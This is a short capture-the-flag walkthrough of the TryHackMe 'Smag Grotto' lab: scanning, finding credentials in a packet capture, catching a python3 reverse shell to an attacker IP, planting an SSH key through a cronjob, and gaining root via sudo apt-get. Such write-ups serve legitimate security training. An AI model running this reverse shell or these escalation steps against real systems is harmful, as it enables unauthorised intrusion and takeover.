Simple walkthrough of how I completed the “Smag Grotto” room on tryhackme.com
Enumeration
Running a Nmap scan using version detection and scan script gave us 2 open ports 22 (SSH) and 80 (HTTP).
nmap -sC -sV 10.10.172.176
Website
Checking out the website doesn’t initially give us much to go on
There's also nothing hiding in the source code, time to use Gobuster and search for any additional directories
Running Gobuster gave us an additional directory to view /mail
gobuster dir -u 10.10.172.176 -w /usr/share/wordlists/dirb/common.txt
After viewing /mail we can see a .pcap file which we can download however, we must download it via wget due to a bug with the email2web software
Wireshark
Opening the .pcap file in Wireshark gives us some login credentials and also a login page that appears to be on a subdomain. So we will have to add this subdomain to our hosts file
Initial Foothold
Accessing the newly acquired login page and using the credentials we are presented with a page that allows us to input commands
While commands can be entered they do not output any information so we cannot use this to gain an insight into the system however, we can try to catch a reverse shell
Setup a netcat listener
nc -lvnp <port>
I found that a python3 reverse shell worked for me but others may also work
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Success! We were able to gain a reverse shell
User Escalation
Great, we were able to get a shell was the www-data user but this user usually doesn’t have many privileges so we need to find a way to get access to another user. After looking around the machine for a short while I decided to check out the crontab which is a time-based job scheduler
There looks like there is something we could exploit
This cronjob is reading the contents of the file “jake_id_rsa.pub.backup” and overwriting Jake's ssh public key. If we generate our own pair of keys and replace the file with our own public key we can log in to the SSH as Jake
Use this command to generate a pair of SSH keys and copy the id_rsa.pub key
ssh-keygen
Overwrite the “jake_id_rsa.pub.backup” file with your own public key
echo “<PUBLIC KEY>” > jake_id_rsa.pub.backup
After a minute the cronjob will run and Jake's SSH key will have been overwritten with our own, allowing us to use our created private key to log in
We successfully gained access to the user Jake and can get our first flag, the user flag!
Root Escalation
Whenever I first gain access to a system as a user the first thing I always check is if I can run any commands as sudo which just so happens to be the method of privilege escalation I used to gain root access
sudo -l
The user Jake has been allowed to use the command apt-get as sudo without the use of a password
Checking out the website GTFOBins which shows ways of escalating privilege using misconfigured Unix binaries gives us 3 different ways we can use the apt-get command as sudo to get a root shell
I used this one which executes a command after the update is finished which in this case is a shell and as this command is being run as root this will give us a root shell
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
As you can see this has given us a root shell
Time to get the root flag
And that’s this room completed!
Overall this room was fun and easy to complete!